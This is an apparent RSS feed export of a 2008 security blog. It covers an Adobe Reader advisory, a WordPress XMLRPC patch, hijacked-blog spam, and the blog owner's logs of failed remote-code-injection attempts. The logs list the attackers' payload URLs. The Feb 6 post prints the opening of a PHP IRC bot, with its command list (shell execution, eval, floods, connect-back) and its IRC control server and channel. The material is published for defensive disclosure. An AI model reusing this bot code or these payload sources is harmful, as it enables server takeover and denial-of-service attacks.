<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; vulnerability</title>
	<atom:link href="http://42.kaizeku.com/topics/security/vulnerability/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Adobe Acrobat, Acrobat 3D &#038; Reader Multiple Vulnerabilities</title>
		<link>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</link>
		<comments>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:35:38 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[acrobat]]></category>

		<category><![CDATA[acrobat3d]]></category>

		<category><![CDATA[adobe+reader]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[reader]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</guid>
		<description><![CDATA[One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code. The code will run with the privileges of the target user opening the PDF document.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png' alt='adobe reader' longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png" width="110" height="110" title="Adobe Reader" class="photo thumb- fl" />A JavaScript <a class="exturl icn-r1" href="http://en.wikipedia.org/wiki/Buffer_overflow">Buffer Overflow</a> in <strong class="fw-"><a href="http://www.adobe.com/products/acrobat/">Adobe Acrobat</a></strong>, <strong class="fw-"><a href="http://www.adobe.com/products/acrobat3d/">Acrobat 3D</a></strong> &#038; <strong class="fw-"><a href="http://www.adobe.com/products/reader/">Reader</a></strong> allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document. </p>
<p>Excerpt from <em>iDefense </em>Public Advisory;</p>
<blockquote cite="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656"><p class="cite">Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.</p>
</blockquote>
<h2>Workaround</h2>
<p>Disabled Adobe Reader &#038; Acrobat JavaScript. Perform Update &darr;</p>
<h2>Update -Adobe Acrobat &#038; Reader version 8.1.2 </h2>
<p>Adobe released version 8.1.2 of Adobe Reader, Acrobat &#038; Acrobat 3D to address<br />
these vulnerabilities.</p>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/go/getreader" title="Download Adobe Reader 8.1.2">Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849" title="Download Acrobat 8.1.2 for Windows">Acrobat 8 users on Windows update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3856" title="Download Acrobat 8.1.2 for Mac">Acrobat 8 users on Macintosh update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3850" title="Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2">Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2</a></li>
</ul>
<p class="mgt">These <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656" class="exturl icn-r1" >vulnerabilities</a> were discovered by <span class="vcard"><a href="http://labs.idefense.com/" class="url fn microformat icn-r1"><span class="give-name">Greg </span> <span class="family-name">MacManus</span></a> of <span class="org"><a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655">VeriSign iDefense Labs</a></span></span>. </p>
<p><span id="more-194"></span></p>
<h2>Related Posts</h2>
<ul class="xoxo exturl">
<li><a class="inturl" href="/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/" title="How to safely remove AcroRd32Info.exe">How to safely remove AcroRd32Info.exe (Adobe Reader)</a></li>
</ul>
<h2 class="mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/support/security/advisories/apsa08-01.html" title="Security update available for Adobe Reader and Acrobat 8">Security update available for Adobe Reader and Acrobat 8 (APSA08-01)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attemps on blog.kakkoi.net - Feb 6th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 22:59:53 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[googlebot]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/</guid>
		<description><![CDATA[

 Today&#8217;s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &#8595;. The first attacker is from 212.24.62.200 &#8594; udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> Today&#8217;s we just upgrade from <strong>WordPress 2.3.2</strong> to <strong>2.3.3 security release</strong>. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts &darr;. The first attacker is from 212.24.62.200 &rarr; udkado.ru masking their useragent as <strong>Googlebot</strong> (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort. </p>
<p>The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of <abbr title="Dynamic Domain Name Server">DDNS</abbr> (china &rarr; korea &rarr; us ). Noticeably the scans pattern is predictable. From our <a href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Feb 5th attack</a> all these botnet is targeting certain search keywords <em>security, injection</em> so we setup a honey-pot right on that particular URL.<br />
<span id="more-189"></span></p>
<h2>Hacking Attempts on Kakkoi</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=212.24.62.200" class="exturl icn-r" rel="nofollow">212.24.62.200</a></small></td>
<td><small><a href="http://www.useragentstring.com/pages/Googlebot/">Googlebot</a></small></td>
<td>1</td>
<td><small><a href="http://api.hostip.info/?ip=212.24.62.200" class="exturl icn-r" rel="nofollow">Russia</a></small></td>
<td>
<ul class="xoxo r">
<li><small>www.yahoo.com</small></li>
<li><small>Request URI: <a href="/uri/d3d3LnlhaG9vLmNvbQ.curie,80,302" rev="curie:302" title="Yahoo!">www.yahoo.com</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=61.152.158.46" class="exturl icn-r" rel="nofollow">61.152.158.46</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=61.152.158.46" class="exturl icn-r" rel="nofollow">China</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td>
<ol class="xoxo r">
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.88.3.47" class="exturl icn-r" rel="nofollow">85.88.3.47</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=74.205.123.49" class="exturl icn-r" rel="nofollow">74.205.123.49</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=210.205.6.161" class="exturl icn-r" rel="nofollow">210.205.6.161</a></small></li>
<li><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=207.44.246.45" class="exturl icn-r" rel="nofollow">207.44.246.45</a></small></li>
</ol>
</td>
<td>N/A</td>
<td>16</td>
<td>
<ol class="xoxo r">
<li><small><a href="http://api.hostip.info/?ip=85.88.3.47" class="exturl icn-r" rel="nofollow">Germany</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=74.205.123.49" class="exturl icn-r" rel="nofollow">US</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=210.205.6.161" class="exturl icn-r" rel="nofollow">Korea</a></small></li>
<li><small><a href="http://api.hostip.info/?ip=207.44.246.45" class="exturl icn-r" rel="nofollow">US</a></small></li>
</ol>
</td>
<td>
<ul class="xoxo r">
<li><small>http://basiclifesaving.org/mycomments/rom.txt</small></li>
<li><small>http://www.freewebtown.com/acc827/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>The Bot-herder Host</h2>
<p>Part of class <strong>pBot</strong> source taken from <tt class="di">http://basiclifesaving.org/mycomments/rom.txt</tt></p>
<pre class="prebox">
&lt;? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ &lt;admin@xdevil.org&gt;
 *
 * COMMANDS:
 *
 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Wordpress 2.3.2 XMLRPC Exploit Unofficial Patch</title>
		<link>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</link>
		<comments>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/#comments</comments>
		<pubDate>Sat, 02 Feb 2008 21:32:51 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[0-day]]></category>

		<category><![CDATA[metaWeblog]]></category>

		<category><![CDATA[patch]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</guid>
		<description><![CDATA[This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WP Developer decide to stop arguing on the mailing list and came out with WordPress securities fix release (maybe for v 2.3.5) You might want to try this “Temporary” workaround suggest by SecuriTeam - Paul (Yabba) Jones.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.thumbnail.jpg' alt='this is relevant to my interest lolcat' width='128' height='100' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.jpg' />This issue has been raised <a href="http://wordpress.org/support/topic/134928/">4 months ago</a> (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this &#8220;debatable&#8221; patch by <a href="http://www.securiteam.com" class="exturl icn-r">SecuriTeam</a> - Paul (Yabba) Jones. </p>
<p class="notice cb mgt">Note: <span class="vcard"><a class="url fn microformat icn-r" href="http://ma.tt" title="Matt Mullenweg - PhotoMatt"><span class="given-name">Matt</span> <span class="family-name">Mullenweg</span></a></span> &#038; the <a href="http://lists.automattic.com/mailman/listinfo/wp-hackers">WP-Hackers</a> is against secureTeam &#8220;hasty-patch&#8221; and their <abbr title="Proof of Concept">POC</abbr> release. <small><a href="http://comox.textdrive.com/pipermail/wp-hackers/2008-February/017544" class="exturl icn-r">[wp-hackers] xmlrpc issue or no?</a></small>.</p>
<p><em>Excerpt from Wordpress Support Forum &raquo; <a href="http://wordpress.org/support/topic/134928/">iframe injection problem?</a></em></p>
<blockquote cite="http://wordpress.org/support/topic/134928/page/3#post-686803"><p class="quote"><a href="http://wordpress.org/support/topic/134928/page/3#post-686803" class="exturl icn-r">Matt Mullenweg</a> &rarr; [...] I would rather not have people think they&#8217;re safe and really not be, and there is a release coming shortly anyway. [...]<br />
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. <small>~ Feb 3, 2008</small> </p>
</blockquote>
<p><span id="more-170"></span></p>
<p class="notice"><a href="http://blog.kakkoi.net/wordpress/wordpress-233-security-release/">WordPress 2.3.3</a> has been release it&#8217;s advice not to try this patches</p>
<h2>Patch xmlrpc.php via WordPress Admin</h2>
<ol class="xoxo">
<li> Login to Wordpress Admin</li>
<li class="cf"><a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' title='manage-files-xmlrpc.png' class="rr fr"><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.thumbnail.png' alt='manage-files-xmlrpc.png' width='128' height='64' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' /></a> Goto Manage &raquo; Files then scroll down to &#8220;Other Files&#8221; sections, type in <em>xmlrpc.php</em>. otherwise type the following URL in your browser address-bar &darr;
<pre>mydomain.com/wp-admin/templates.php?file=xmlrpc.php&#038;submit=Edit+file+%C2%BB</pre>
</li>
<li>Find the following code (around Line <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">1151</a> - 1203 ) within <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#1123" class="exturl icn-r">wp_xmlrpc_server::mw_editPost()</a> class methods &darr;
<pre>if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )</pre>
</li>
<li>Replace with
<pre class="prebox">
//if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
 if ( ( 1 || 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
</pre>
<p>saved.
</li>
<li>Disabled New User Registrations for temporary.</li>
</ol>
<h2>External Links</h2>
<ul>
<li><a href="http://wordpress.org/support/topic/134928/" class="exturl icn-r">Wordpress Support Forum &rarr; iframe injection problem?</a></li>
<li><a href="http://www.securiteam.com/unixfocus/5HP010KNFK.html#ArticleTABLE" class="exturl icn-r">SecuriTeam &rarr; WordPress 2.3.2 XMLRPC Vulnerability <abbr title="proof of concept">POC</abbr></a>
<li><a href="http://en.wikipedia.org/wiki/XML-RPC" class="exturl icn-r">Wikipedia XML-RPC</a></li>
<li><a href="http://www.google.com/search?hl=en&amp;q=Wordpress+XML-RPC+Vulnerabilities" class="exturl icn-r">Google &rarr; Wordpress XML-RPC Vulnerabilities</a></li>
<li><a class="exturl icn-r" href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">PHPXREF wp-trunk xmlrpc source</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</title>
		<link>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/#comments</comments>
		<pubDate>Thu, 31 Jan 2008 17:07:22 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[Being Hacked by SEO spammer is like a yearly events at Mattheaton.com. Bluehost CEO WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at  &#8594; Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />Being Hacked by SEO spammer is seem like a yearly events at <span class="vcard"><a href="http://mattheaton.com" class="url fn microformat icn-r1">Mattheaton.com</a></span>. Matt&#8217;s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a>.</p>
<p>It&#8217;s a big embarrassment for <a rel="nofollow" class="exturl icn-r1" href="http://www.bluehost.com">bluehost</a> &#038; <a rel="nofollow" href="http://www.hostmonster.com" class="exturl icn-r1">hostmonster</a> hosting to have their CEO&#8217;s blog being spamride every year (since 2007) . Drilling Matt Heaton&#8217;s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.</p>
<p><span id="more-156"></span></p>
<h2 class="cb mgt">Mattheaton Goro Spam Chronology</h2>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td><small>Jul 2007</small></td>
<td> Google PR 7</td>
</tr>
<tr>
<td><small>Aug 2007</small></td>
<td> Stop being Index by <a rel="nofollow" class="exturl icn-r1" href="http://web.archive.org/web/*/http://www.mattheaton.com">archive.org</a></td>
</tr>
<tr>
<td><small>Nov 28th 2007</small></td>
<td> <strong class="fw-">Wordpress.net.in</strong> Goro Spam on wp_footer backlink to <a class="exturl icn-r1" href="http://www.howardowens.com/">howardowens.com</a></td>
</tr>
<tr>
<td><small>Dec 4th 2007</small></td>
<td>Unknown Goro Spam on wp_head backlink to <a href="http://tangonoticias.com/" class="exturl icn-r1">tangonoticias.com</a></td>
</tr>
<tr>
<td><small>Dec 11th 2007</small></td>
<td>Wordpress Upgrade to version 2.3.1</td>
</tr>
<tr>
<td><small>Jan 16th, 2008</small></td>
<td>Google PR5</td>
</tr>
<tr>
<td><small>Jan 26th, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.brainware-india.com/" rel="nofollow" class="exturl icn-r1">brainwave-india.com</a></td>
</tr>
<tr>
<td><small>Feb 3rd, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.thinkingphp.org/" rel="nofollow" class="exturl icn-r1">thinkingphp.org</a></td>
</tr>
<tr>
<td><small>Feb 8th, 2008</small></td>
<td>Unknown uusing CSS cloacking method on wp_head backlink to <a href="http://www.zoorender.com/" rel="nofollow" class="exturl icn-r1">zoorender.com</a></td>
</tr>
<tr>
<td><small>Feb 13th, 2008</small></td>
